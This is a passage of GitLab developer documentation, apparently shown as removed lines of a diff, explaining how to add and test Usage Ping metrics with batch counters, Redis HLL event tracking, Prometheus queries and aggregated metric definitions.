distinct_count(::BulkImport, :user_id) - - add(project_imports, bulk_imports) -``` - -### Estimated Batch Counters - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48233) in GitLab 13.7. - -Estimated batch counter functionality handles `ActiveRecord::StatementInvalid` errors -when used through the provided `estimate_batch_distinct_count` method. -Errors return a value of `-1`. - -WARNING: -This functionality estimates a distinct count of a specific ActiveRecord_Relation in a given column, -which uses the [HyperLogLog](http://algo.inria.fr/flajolet/Publications/FlFuGaMe07.pdf) algorithm. -As the HyperLogLog algorithm is probabilistic, the **results always include error**. -The highest encountered error rate is 4.9%. - -When correctly used, the `estimate_batch_distinct_count` method enables efficient counting over -columns that contain non-unique values, which can not be assured by other counters. - -#### estimate_batch_distinct_count method - -Method: `estimate_batch_distinct_count(relation, column = nil, batch_size: nil, start: nil, finish: nil)` - -The [method](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/utils/usage_data.rb#L63) -includes the following arguments: - -- `relation`: The ActiveRecord_Relation to perform the count. -- `column`: The column to perform the distinct count. The default is the primary key. -- `batch_size`: From `Gitlab::Database::PostgresHll::BatchDistinctCounter::DEFAULT_BATCH_SIZE`. Default value: 10,000. -- `start`: The custom start of the batch count, to avoid complex minimum calculations. -- `finish`: The custom end of the batch count to avoid complex maximum calculations. - -The method includes the following prerequisites: - -1. The supplied `relation` must include the primary key defined as the numeric column. - For example: `id bigint NOT NULL`. -1. The `estimate_batch_distinct_count` can handle a joined relation. To use its ability to - count non-unique columns, the joined relation **must NOT** have a one-to-many relationship, - such as `has_many :boards`. -1. Both `start` and `finish` arguments should always represent primary key relationship values, - even if the estimated count refers to another column, for example: - - ```ruby - estimate_batch_distinct_count(::Note, :author_id, start: ::Note.minimum(:id), finish: ::Note.maximum(:id)) - ``` - -Examples: - -1. Simple execution of estimated batch counter, with only relation provided, - returned value represents estimated number of unique values in `id` column - (which is the primary key) of `Project` relation: - - ```ruby - estimate_batch_distinct_count(::Project) - ``` - -1. Execution of estimated batch counter, where provided relation has applied - additional filter (`.where(time_period)`), number of unique values estimated - in custom column (`:author_id`), and parameters: `start` and `finish` together - apply boundaries that defines range of provided relation to analyze: - - ```ruby - estimate_batch_distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::Note.minimum(:id), finish: ::Note.maximum(:id)) - ``` - -1. Execution of estimated batch counter with joined relation (`joins(:cluster)`), - for a custom column (`'clusters.user_id'`): - - ```ruby - estimate_batch_distinct_count(::Clusters::Applications::CertManager.where(time_period).available.joins(:cluster), 'clusters.user_id') - ``` - -When instrumenting metric with usage of estimated batch counter please add -`_estimated` suffix to its name, for example: - -```ruby - "counts": { - "ci_builds_estimated": estimate_batch_distinct_count(Ci::Build), - ... -``` - -### Redis Counters - -Handles `::Redis::CommandError` and `Gitlab::UsageDataCounters::BaseCounter::UnknownEvent` -returns -1 when a block is sent or hash with all values -1 when a `counter(Gitlab::UsageDataCounters)` is sent -different behavior due to 2 different implementations of Redis counter - -Method: `redis_usage_data(counter, &block)` - -Arguments: - -- `counter`: a counter from `Gitlab::UsageDataCounters`, that has `fallback_totals` method implemented -- or a `block`: which is evaluated - -#### Ordinary Redis Counters - -Examples of implementation: - -- Using Redis methods [`INCR`](https://redis.io/commands/incr), [`GET`](https://redis.io/commands/get), and [`Gitlab::UsageDataCounters::WikiPageCounter`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/wiki_page_counter.rb) -- Using Redis methods [`HINCRBY`](https://redis.io/commands/hincrby), [`HGETALL`](https://redis.io/commands/hgetall), and [`Gitlab::UsageCounters::PodLogs`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_counters/pod_logs.rb) - -##### UsageData API Tracking - -<!-- There's nearly identical content in `##### Adding new events`. If you fix errors here, you may need to fix the same errors in the other location. --> - -1. Track event using `UsageData` API - - Increment event count using ordinary Redis counter, for given event name. - - Tracking events using the `UsageData` API requires the `usage_data_api` feature flag to be enabled, which is enabled by default. - - API requests are protected by checking for a valid CSRF token. - - To be able to increment the values, the related feature `usage_data_<event_name>` should be enabled. - - ```plaintext - POST /usage_data/increment_counter - ``` - - | Attribute | Type | Required | Description | - | :-------- | :--- | :------- | :---------- | - | `event` | string | yes | The event name it should be tracked | - - Response - - - `200` if event was tracked - - `400 Bad request` if event parameter is missing - - `401 Unauthorized` if user is not authenticated - - `403 Forbidden` for invalid CSRF token provided - -1. Track events using JavaScript/Vue API helper which calls the API above - - Note that `usage_data_api` and `usage_data_#{event_name}` should be enabled to be able to track events - - ```javascript - import api from '~/api'; - - api.trackRedisCounterEvent('my_already_defined_event_name'), - ``` - -#### Redis HLL Counters - -WARNING: -HyperLogLog (HLL) is a probabilistic algorithm and its **results always includes some small error**. According to [Redis documentation](https://redis.io/commands/pfcount), data from -used HLL implementation is "approximated with a standard error of 0.81%". - -With `Gitlab::UsageDataCounters::HLLRedisCounter` we have available data structures used to count unique values. - -Implemented using Redis methods [PFADD](https://redis.io/commands/pfadd) and [PFCOUNT](https://redis.io/commands/pfcount). - -##### Adding new events - -1. Define events in [`known_events`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/). - - Example event: - - ```yaml - - name: users_creating_epics - category: epics_usage - redis_slot: users - aggregation: weekly - feature_flag: track_epics_activity - ``` - - Keys: - - - `name`: unique event name. - - Name format for Redis HLL events `<name>_<redis_slot>`. - - [See Metric name](metrics_dictionary.md#metric-name) for a complete guide on metric naming suggestion. - - Consider including in the event's name the Redis slot to be able to count totals for a specific category. - - Example names: `users_creating_epics`, `users_triggering_security_scans`. - - - `category`: event category. Used for getting total counts for events in a category, for easier - access to a group of events. - - `redis_slot`: optional Redis slot. Default value: event name. Only event data that is stored in the same slot - can be aggregated. Ensure keys are in the same slot. For example: - `users_creating_epics` with `redis_slot: 'users'` builds Redis key - `{users}_creating_epics-2020-34`. If `redis_slot` is not defined the Redis key will - be `{users_creating_epics}-2020-34`. - Recommended slots to use are: `users`, `projects`. This is the value we count. - - `expiry`: expiry time in days. Default: 29 days for daily aggregation and 6 weeks for weekly - aggregation. - - `aggregation`: may be set to a `:daily` or `:weekly` key. Defines how counting data is stored in Redis. - Aggregation on a `daily` basis does not pull more fine grained data. - - `feature_flag`: optional `default_enabled: :yaml`. If no feature flag is set then the tracking is enabled. One feature flag can be used for multiple events. For details, see our [GitLab internal Feature flags](../feature_flags/index.md) documentation. The feature flags are owned by the group adding the event tracking. - -Use one of the following methods to track events: - -1. Track event in controller using `RedisTracking` module with `track_redis_hll_event(*controller_actions, name:, if: nil, &block)`. - - Arguments: - - - `controller_actions`: controller actions we want to track. - - `name`: event name. - - `if`: optional custom conditions, using the same format as with Rails callbacks. - - `&block`: optional block that computes and returns the `custom_id` that we want to track. This will override the `visitor_id`. - - Example usage: - - ```ruby - # controller - class ProjectsController < Projects::ApplicationController - include RedisTracking - - skip_before_action :authenticate_user!, only: :show - track_redis_hll_event :index, :show, name: 'users_visiting_projects' - - def index - render html: 'index' - end - - def new - render html: 'new' - end - - def show - render html: 'show' - end - end - ``` - -1. Track event in API using `increment_unique_values(event_name, values)` helper method. - - Arguments: - - - `event_name`: event name. - - `values`: values counted, one value or array of values. - - Example usage: - - ```ruby - get ':id/registry/repositories' do - repositories = ContainerRepositoriesFinder.new( - user: current_user, subject: user_group - ).execute - - increment_unique_values('users_listing_repositories', current_user.id) - - present paginate(repositories), with: Entities::ContainerRegistry::Repository, tags: params[:tags], tags_count: params[:tags_count] - end - ``` - -1. Track event using `track_usage_event(event_name, values)` in services and GraphQL - - Increment unique values count using Redis HLL, for given event name. - - Example: - - [Track usage event for incident created in service](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/app/services/issues/update_service.rb#L66) - - [Track usage event for incident created in GraphQL](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.8.3-ee/app/graphql/mutations/alert_management/update_alert_status.rb#L16) - - ```ruby - track_usage_event(:incident_management_incident_created, current_user.id) - ``` - -<!-- There's nearly identical content in `##### UsageData API Tracking`. If you find / fix errors here, you may need to fix errors in that section too. --> - -1. Track event using `UsageData` API - - Increment unique users count using Redis HLL, for given event name. - - Tracking events using the `UsageData` API requires the `usage_data_api` feature flag to be enabled, which is enabled by default. - - API requests are protected by checking for a valid CSRF token. - - ```plaintext - POST /usage_data/increment_unique_users - ``` - - | Attribute | Type | Required | Description | - | :-------- | :--- | :------- | :---------- | - | `event` | string | yes | The event name it should be tracked | - - Response - - Return 200 if tracking failed for any reason. - - - `200` if event was tracked or any errors - - `400 Bad request` if event parameter is missing - - `401 Unauthorized` if user is not authenticated - - `403 Forbidden` for invalid CSRF token provided - -1. Track events using JavaScript/Vue API helper which calls the API above - - Example usage for an existing event already defined in [known events](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/): - - Usage Data API is behind `usage_data_api` feature flag which, as of GitLab 13.7, is - now set to `default_enabled: true`. - - ```javascript - import api from '~/api'; - - api.trackRedisHllUserEvent('my_already_defined_event_name'), - ``` - -1. Get event data using `Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names:, start_date:, end_date:, context: '')`. - - Arguments: - - - `event_names`: the list of event names. - - `start_date`: start date of the period for which we want to get event data. - - `end_date`: end date of the period for which we want to get event data. - - `context`: context of the event. Allowed values are `default`, `free`, `bronze`, `silver`, `gold`, `starter`, `premium`, `ultimate`. - -1. Testing tracking and getting unique events - -Trigger events in rails console by using `track_event` method - - ```ruby - Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_viewing_compliance_audit_events', values: 1) - Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_viewing_compliance_audit_events', values: [2, 3]) - ``` - -Next, get the unique events for the current week. - - ```ruby - # Get unique events for metric for current_week - Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names: 'users_viewing_compliance_audit_events', - start_date: Date.current.beginning_of_week, end_date: Date.current.next_week) - ``` - -##### Recommendations - -We have the following recommendations for [Adding new events](#adding-new-events): - -- Event aggregation: weekly. -- Key expiry time: - - Daily: 29 days. - - Weekly: 42 days. -- When adding new metrics, use a [feature flag](../../operations/feature_flags.md) to control the impact. -- For feature flags triggered by another service, set `default_enabled: false`, - - Events can be triggered using the `UsageData` API, which helps when there are > 10 events per change - -##### Enable/Disable Redis HLL tracking - -Events are tracked behind optional [feature flags](../feature_flags/index.md) due to concerns for Redis performance and scalability. - -For a full list of events and corresponding feature flags see, [known_events](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/) files. - -To enable or disable tracking for specific event in <https://gitlab.com> or <https://about.staging.gitlab.com>, run commands such as the following to -[enable or disable the corresponding feature](../feature_flags/index.md). - -```shell -/chatops run feature set <feature_name> true -/chatops run feature set <feature_name> false -``` - -We can also disable tracking completely by using the global flag: - -```shell -/chatops run feature set redis_hll_tracking true -/chatops run feature set redis_hll_tracking false -``` - -##### Known events are added automatically in usage data payload - -All events added in [`known_events/common.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/common.yml) are automatically added to usage data generation under the `redis_hll_counters` key. This column is stored in [version-app as a JSON](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/db/schema.rb#L209). -For each event we add metrics for the weekly and monthly time frames, and totals for each where applicable: - -- `#{event_name}_weekly`: Data for 7 days for daily [aggregation](#adding-new-events) events and data for the last complete week for weekly [aggregation](#adding-new-events) events. -- `#{event_name}_monthly`: Data for 28 days for daily [aggregation](#adding-new-events) events and data for the last 4 complete weeks for weekly [aggregation](#adding-new-events) events. - -Redis HLL implementation calculates automatic total metrics, if there are more than one metric for the same category, aggregation, and Redis slot. - -- `#{category}_total_unique_counts_weekly`: Total unique counts for events in the same category for the last 7 days or the last complete week, if events are in the same Redis slot and we have more than one metric. -- `#{category}_total_unique_counts_monthly`: Total unique counts for events in same category for the last 28 days or the last 4 complete weeks, if events are in the same Redis slot and we have more than one metric. - -Example of `redis_hll_counters` data: - -```ruby -{:redis_hll_counters=> - {"compliance"=> - {"users_viewing_compliance_dashboard_weekly"=>0, - "users_viewing_compliance_dashboard_monthly"=>0, - "users_viewing_compliance_audit_events_weekly"=>0, - "users_viewing_audit_events_monthly"=>0, - "compliance_total_unique_counts_weekly"=>0, - "compliance_total_unique_counts_monthly"=>0}, - "analytics"=> - {"users_viewing_analytics_group_devops_adoption_weekly"=>0, - "users_viewing_analytics_group_devops_adoption_monthly"=>0, - "analytics_total_unique_counts_weekly"=>0, - "analytics_total_unique_counts_monthly"=>0}, - "ide_edit"=> - {"users_editing_by_web_ide_weekly"=>0, - "users_editing_by_web_ide_monthly"=>0, - "users_editing_by_sfe_weekly"=>0, - "users_editing_by_sfe_monthly"=>0, - "ide_edit_total_unique_counts_weekly"=>0, - "ide_edit_total_unique_counts_monthly"=>0} - } -``` - -Example usage: - -```ruby -# Redis Counters -redis_usage_data(Gitlab::UsageDataCounters::WikiPageCounter) -redis_usage_data { ::Gitlab::UsageCounters::PodLogs.usage_totals[:total] } - -# Define events in common.yml https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data_counters/known_events/common.yml - -# Tracking events -Gitlab::UsageDataCounters::HLLRedisCounter.track_event('users_expanding_vulnerabilities', values: visitor_id) - -# Get unique events for metric -redis_usage_data { Gitlab::UsageDataCounters::HLLRedisCounter.unique_events(event_names: 'users_expanding_vulnerabilities', start_date: 28.days.ago, end_date: Date.current) } -``` - -### Alternative Counters - -Handles `StandardError` and fallbacks into -1 this way not all measures fail if we encounter one exception. -Mainly used for settings and configurations. - -Method: `alt_usage_data(value = nil, fallback: -1, &block)` - -Arguments: - -- `value`: a simple static value in which case the value is simply returned. -- or a `block`: which is evaluated -- `fallback: -1`: the common value used for any metrics that are failing. - -Usage: - -```ruby -alt_usage_data { Gitlab::VERSION } -alt_usage_data { Gitlab::CurrentSettings.uuid } -alt_usage_data(999) -``` - -### Adding counters to build new metrics - -When adding the results of two counters, use the `add` usage data method that -handles fallback values and exceptions. It also generates a valid [SQL export](#exporting-usage-ping-sql-queries-and-definitions). - -Example usage: - -```ruby -add(User.active, User.bot) -``` - -### Prometheus Queries - -In those cases where operational metrics should be part of Usage Ping, a database or Redis query is unlikely -to provide useful data. Instead, Prometheus might be more appropriate, because most GitLab architectural -components publish metrics to it that can be queried back, aggregated, and included as usage data. - -NOTE: -Prometheus as a data source for Usage Ping is currently only available for single-node Omnibus installations -that are running the [bundled Prometheus](../../administration/monitoring/prometheus/index.md) instance. - -To query Prometheus for metrics, a helper method is available to `yield` a fully configured -`PrometheusClient`, given it is available as per the note above: - -```ruby -with_prometheus_client do |client| - response = client.query('<your query>') - ... -end -``` - -Please refer to [the `PrometheusClient` definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/prometheus_client.rb) -for how to use its API to query for data. - -### Fallback values for UsagePing - -We return fallback values in these cases: - -| Case | Value | -|-----------------------------|-------| -| Deprecated Metric | -1000 | -| Timeouts, general failures | -1 | -| Standard errors in counters | -2 | - -## Developing and testing Usage Ping - -### 1. Naming and placing the metrics - -Add the metric in one of the top level keys - -- `settings`: for settings related metrics. -- `counts_weekly`: for counters that have data for the most recent 7 days. -- `counts_monthly`: for counters that have data for the most recent 28 days. -- `counts`: for counters that have data for all time. - -### 2. Use your Rails console to manually test counters - -```ruby -# count -Gitlab::UsageData.count(User.active) -Gitlab::UsageData.count(::Clusters::Cluster.aws_installed.enabled, :cluster_id) - -# count distinct -Gitlab::UsageData.distinct_count(::Project, :creator_id) -Gitlab::UsageData.distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::User.minimum(:id), finish: ::User.maximum(:id)) -``` - -### 3. Generate the SQL query - -Your Rails console returns the generated SQL queries. - -Example: - -```ruby -pry(main)> Gitlab::UsageData.count(User.active) - (2.6ms) SELECT "features"."key" FROM "features" - (15.3ms) SELECT MIN("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) - (2.4ms) SELECT MAX("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) - (1.9ms) SELECT COUNT("users"."id") FROM "users" WHERE ("users"."state" IN ('active')) AND ("users"."user_type" IS NULL OR "users"."user_type" IN (6, 4)) AND "users"."id" BETWEEN 1 AND 100000 -``` - -### 4. Optimize queries with #database-lab - -Paste the SQL query into `#database-lab` to see how the query performs at scale. - -- `#database-lab` is a Slack channel which uses a production-sized environment to test your queries. -- GitLab.com's production database has a 15 second timeout. -- Any single query must stay below [1 second execution time](../query_performance.md#timing-guidelines-for-queries) with cold caches. -- Add a specialized index on columns involved to reduce the execution time. - -To have an understanding of the query's execution we add in the MR description the following information: - -- For counters that have a `time_period` test we add information for both cases: - - `time_period = {}` for all time periods - - `time_period = { created_at: 28.days.ago..Time.current }` for last 28 days period -- Execution plan and query time before and after optimization -- Query generated for the index and time -- Migration output for up and down execution - -We also use `#database-lab` and [explain.depesz.com](https://explain.depesz.com/). For more details, see the [database review guide](../database_review.md#preparation-when-adding-or-modifying-queries). - -#### Optimization recommendations and examples - -- Use specialized indexes [example 1](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/26871), [example 2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/26445). -- Use defined `start` and `finish`, and simple queries. These values can be memoized and reused, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/37155). -- Avoid joins and write the queries as simply as possible, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/36316). -- Set a custom `batch_size` for `distinct_count`, [example](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/38000). - -### 5. Add the metric definition - -[Check Metrics Dictionary Guide](metrics_dictionary.md) - -When adding, updating, or removing metrics, please update the [Metrics Dictionary](dictionary.md). - -### 6. Add new metric to Versions Application - -Check if new metrics need to be added to the Versions Application. See `usage_data` [schema](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/db/schema.rb#L147) and usage data [parameters accepted](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/app/services/usage_ping.rb). Any metrics added under the `counts` key are saved in the `stats` column. - -### 7. Add the feature label - -Add the `feature` label to the Merge Request for new Usage Ping metrics. These are user-facing changes and are part of expanding the Usage Ping feature. - -### 8. Add a changelog - -Ensure you comply with the [Changelog entries guide](../changelog.md). - -### 9. Ask for a Product Intelligence Review - -On GitLab.com, we have DangerBot setup to monitor Product Intelligence related files and DangerBot recommends a [Product Intelligence review](product_intelligence_review.md). Mention `@gitlab-org/growth/product_intelligence/engineers` in your MR for a review. - -### 10. Verify your metric - -On GitLab.com, the Product Intelligence team regularly [monitors Usage Ping](https://gitlab.com/groups/gitlab-org/-/epics/6000). -They may alert you that your metrics need further optimization to run quicker and with greater success. - -The Usage Ping JSON payload for GitLab.com is shared in the -[#g_product_intelligence](https://gitlab.slack.com/archives/CL3A7GFPF) Slack channel every week. - -You may also use the [Usage Ping QA dashboard](https://app.periscopedata.com/app/gitlab/632033/Usage-Ping-QA) to check how well your metric performs. The dashboard allows filtering by GitLab version, by "Self-managed" & "SaaS" and shows you how many failures have occurred for each metric. Whenever you notice a high failure rate, you may re-optimize your metric. - -### Usage Ping local setup - -To set up Usage Ping locally, you must: - -1. [Set up local repositories](#set-up-local-repositories). -1. [Test local setup](#test-local-setup). -1. (Optional) [Test Prometheus-based usage ping](#test-prometheus-based-usage-ping). - -#### Set up local repositories - -1. Clone and start [GitLab](https://gitlab.com/gitlab-org/gitlab-development-kit). -1. Clone and start [Versions Application](https://gitlab.com/gitlab-services/version-gitlab-com). - Make sure to run `docker-compose up` to start a PostgreSQL and Redis instance. -1. Point GitLab to the Versions Application endpoint instead of the default endpoint: - 1. Open [submit_usage_ping_service.rb](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L4) in your local and modified `PRODUCTION_URL`. - 1. Set it to the local Versions Application URL `http://localhost:3000/usage_data`. - -#### Test local setup - -1. Using the `gitlab` Rails console, manually trigger a usage ping: - - ```ruby - SubmitUsagePingService.new.execute - ``` - -1. Use the `versions` Rails console to check the usage ping was successfully received, - parsed, and stored in the Versions database: - - ```ruby - UsageData.last - ``` - -### Test Prometheus-based usage ping - -If the data submitted includes metrics [queried from Prometheus](#prometheus-queries) -you want to inspect and verify, you must: - -- Ensure that a Prometheus server is running locally. -- Ensure the respective GitLab components are exporting metrics to the Prometheus server. - -If you do not need to test data coming from Prometheus, no further action -is necessary. Usage Ping should degrade gracefully in the absence of a running Prometheus server. - -Three kinds of components may export data to Prometheus, and are included in Usage Ping: - -- [`node_exporter`](https://github.com/prometheus/node_exporter): Exports node metrics - from the host machine. -- [`gitlab-exporter`](https://gitlab.com/gitlab-org/gitlab-exporter): Exports process metrics - from various GitLab components. -- Other various GitLab services, such as Sidekiq and the Rails server, which export their own metrics. - -#### Test with an Omnibus container - -This is the recommended approach to test Prometheus based Usage Ping. - -The easiest way to verify your changes is to build a new Omnibus image from your code branch by using CI, then download the image -and run a local container instance: - -1. From your merge request, click on the `qa` stage, then trigger the `package-and-qa` job. This job triggers an Omnibus -build in a [downstream pipeline of the `omnibus-gitlab-mirror` project](https://gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/-/pipelines). -1. In the downstream pipeline, wait for the `gitlab-docker` job to finish. -1. Open the job logs and locate the full container name including the version. It takes the following form: `registry.gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/gitlab-ee:<VERSION>`. -1. On your local machine, make sure you are signed in to the GitLab Docker registry. You can find the instructions for this in -[Authenticate to the GitLab Container Registry](../../user/packages/container_registry/index.md#authenticate-with-the-container-registry). -1. Once signed in, download the new image by using `docker pull registry.gitlab.com/gitlab-org/build/omnibus-gitlab-mirror/gitlab-ee:<VERSION>` -1. For more information about working with and running Omnibus GitLab containers in Docker, please refer to [GitLab Docker images](https://docs.gitlab.com/omnibus/docker/README.html) in the Omnibus documentation. - -#### Test with GitLab development toolkits - -This is the less recommended approach, because it comes with a number of difficulties when emulating a real GitLab deployment. - -The [GDK](https://gitlab.com/gitlab-org/gitlab-development-kit) is not set up to run a Prometheus server or `node_exporter` alongside other GitLab components. If you would -like to do so, [Monitoring the GDK with Prometheus](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/howto/prometheus/index.md#monitoring-the-gdk-with-prometheus) is a good start. - -The [GCK](https://gitlab.com/gitlab-org/gitlab-compose-kit) has limited support for testing Prometheus based Usage Ping. -By default, it already comes with a fully configured Prometheus service that is set up to scrape a number of components, -but with the following limitations: - -- It does not run a `gitlab-exporter` instance, so several `process_*` metrics from services such as Gitaly may be missing. -- While it runs a `node_exporter`, `docker-compose` services emulate hosts, meaning that it would normally report itself to not be associated -with any of the other services that are running. That is not how node metrics are reported in a production setup, where `node_exporter` -always runs as a process alongside other GitLab components on any given node. From Usage Ping's perspective none of the node data would therefore -appear to be associated to any of the services running, because they all appear to be running on different hosts. To alleviate this problem, the `node_exporter` in GCK was arbitrarily "assigned" to the `web` service, meaning only for this service `node_*` metrics appears in Usage Ping. - -## Aggregated metrics - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/45979) in GitLab 13.6. - -WARNING: -This feature is intended solely for internal GitLab use. - -To add data for aggregated metrics into Usage Ping payload you should add corresponding definition at [`config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/) for metrics available at Community Edition and at [`ee/config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/aggregates/) for Enterprise Edition ones. - -Each aggregate definition includes following parts: - -- `name`: Unique name under which the aggregate metric is added to the Usage Ping payload. -- `operator`: Operator that defines how the aggregated metric data is counted. Available operators are: - - `OR`: Removes duplicates and counts all entries that triggered any of listed events. - - `AND`: Removes duplicates and counts all elements that were observed triggering all of following events. -- `time_frame`: One or more valid time frames. Use these to limit the data included in aggregated metric to events within a specific date-range. Valid time frames are: - - `7d`: Last seven days of data. - - `28d`: Last twenty eight days of data. - - `all`: All historical data, only available for `database` sourced aggregated metrics. -- `source`: Data source used to collect all events data included in aggregated metric. Valid data sources are: - - [`database`](#database-sourced-aggregated-metrics) - - [`redis`](#redis-sourced-aggregated-metrics) -- `events`: list of events names to aggregate into metric. All events in this list must - relay on the same data source. Additional data source requirements are described in the - [Database sourced aggregated metrics](#database-sourced-aggregated-metrics) and - [Redis sourced aggregated metrics](#redis-sourced-aggregated-metrics) sections. -- `feature_flag`: Name of [development feature flag](../feature_flags/index.md#development-type) - that is checked before metrics aggregation is performed. Corresponding feature flag - should have `default_enabled` attribute set to `false`. The `feature_flag` attribute - is optional and can be omitted. When `feature_flag` is missing, no feature flag is checked. - -Example aggregated metric entries: - -```yaml -- name: example_metrics_union - operator: OR - events: - - 'users_expanding_secure_security_report' - - 'users_expanding_testing_code_quality_report' - - 'users_expanding_testing_accessibility_report' - source: redis - time_frame: - - 7d - - 28d -- name: example_metrics_intersection - operator: AND - source: database - time_frame: - - 28d - - all - events: - - 'dependency_scanning_pipeline_all_time' - - 'container_scanning_pipeline_all_time' - feature_flag: example_aggregated_metric -``` - -Aggregated metrics collected in `7d` and `28d` time frames are added into Usage Ping payload under the `aggregated_metrics` sub-key in the `counts_weekly` and `counts_monthly` top level keys. - -```ruby -{ - :counts_monthly => { - :deployments => 1003, - :successful_deployments => 78, - :failed_deployments => 275, - :packages => 155, - :personal_snippets => 2106, - :project_snippets => 407, - :promoted_issues => 719, - :aggregated_metrics => { - :example_metrics_union => 7, - :example_metrics_intersection => 2 - }, - :snippets => 2513 - } -} -``` - -Aggregated metrics for `all` time frame are present in the `count` top level key, with the `aggregate_` prefix added to their name. - -For example: - -`example_metrics_intersection` - -Becomes: - -`counts.aggregate_example_metrics_intersection` - -```ruby -{ - :counts => { - :deployments => 11003, - :successful_deployments => 178, - :failed_deployments => 1275, - :aggregate_example_metrics_intersection => 12 - } -} -``` - -### Redis sourced aggregated metrics - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/45979) in GitLab 13.6. - -To declare the aggregate of events collected with [Redis HLL Counters](#redis-hll-counters), -you must fulfill the following requirements: - -1. All events listed at `events` attribute must come from - [`known_events/*.yml`](#known-events-are-added-automatically-in-usage-data-payload) files. -1. All events listed at `events` attribute must have the same `redis_slot` attribute. -1. All events listed at `events` attribute must have the same `aggregation` attribute. -1. `time_frame` does not include `all` value, which is unavailable for Redis sourced aggregated metrics. - -### Database sourced aggregated metrics - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/52784) in GitLab 13.9. -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's enabled on GitLab.com. - -To declare an aggregate of metrics based on events collected from database, follow -these steps: - -1. [Persist the metrics for aggregation](#persist-metrics-for-aggregation). -1. [Add new aggregated metric definition](#add-new-aggregated-metric-definition). - -#### Persist metrics for aggregation - -Only metrics calculated with [Estimated Batch Counters](#estimated-batch-counters) -can be persisted for database sourced aggregated metrics. To persist a metric, -inject a Ruby block into the -[estimate_batch_distinct_count](#estimate_batch_distinct_count-method) method. -This block should invoke the -`Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll.save_aggregated_metrics` -[method](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage/metrics/aggregates/sources/postgres_hll.rb#L21), -which stores `estimate_batch_distinct_count` results for future use in aggregated metrics. - -The `Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll.save_aggregated_metrics` -method accepts the following arguments: - -- `metric_name`: The name of metric to use for aggregations. Should be the same - as the key under which the metric is added into Usage Ping. -- `recorded_at_timestamp`: The timestamp representing the moment when a given - Usage Ping payload was collected. You should use the convenience method `recorded_at` - to fill `recorded_at_timestamp` argument, like this: `recorded_at_timestamp: recorded_at` -- `time_period`: The time period used to build the `relation` argument passed into - `estimate_batch_distinct_count`. To collect the metric with all available historical - data, set a `nil` value as time period: `time_period: nil`. -- `data`: HyperLogLog buckets structure representing unique entries in `relation`. - The `estimate_batch_distinct_count` method always passes the correct argument - into the block, so `data` argument must always have a value equal to block argument, - like this: `data: result` - -Example metrics persistence: - -```ruby -class UsageData - def count_secure_pipelines(time_period) - ... - relation = ::Security::Scan.latest_successful_by_build.by_scan_types(scan_type).where(security_scans: time_period) - - pipelines_with_secure_jobs['dependency_scanning_pipeline'] = estimate_batch_distinct_count(relation, :commit_id, batch_size: 1000, start: start_id, finish: finish_id) do |result| - ::Gitlab::Usage::Metrics::Aggregates::Sources::PostgresHll - .save_aggregated_metrics(metric_name: 'dependency_scanning_pipeline', recorded_at_timestamp: recorded_at, time_period: time_period, data: result) - end - end -end -``` - -#### Add new aggregated metric definition - -After all metrics are persisted, you can add an aggregated metric definition at -[`aggregated_metrics/`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/). - -To declare the aggregate of metrics collected with [Estimated Batch Counters](#estimated-batch-counters), -you must fulfill the following requirements: - -- Metrics names listed in the `events:` attribute, have to use the same names you passed in the `metric_name` argument while persisting metrics in previous step. -- Every metric listed in the `events:` attribute, has to be persisted for **every** selected `time_frame:` value. - -Example definition: - -```yaml -- name: example_metrics_intersection_database_sourced - operator: AND - source: database - events: - - 'dependency_scanning_pipeline' - - 'container_scanning_pipeline' - time_frame: - - 28d - - all -``` - -## Example Usage Ping payload - -The following is example content of the Usage Ping payload. - -```json -{ - "uuid": "0000000-0000-0000-0000-000000000000", - "hostname": "example.com", - "version": "12.10.0-pre", - "installation_type": 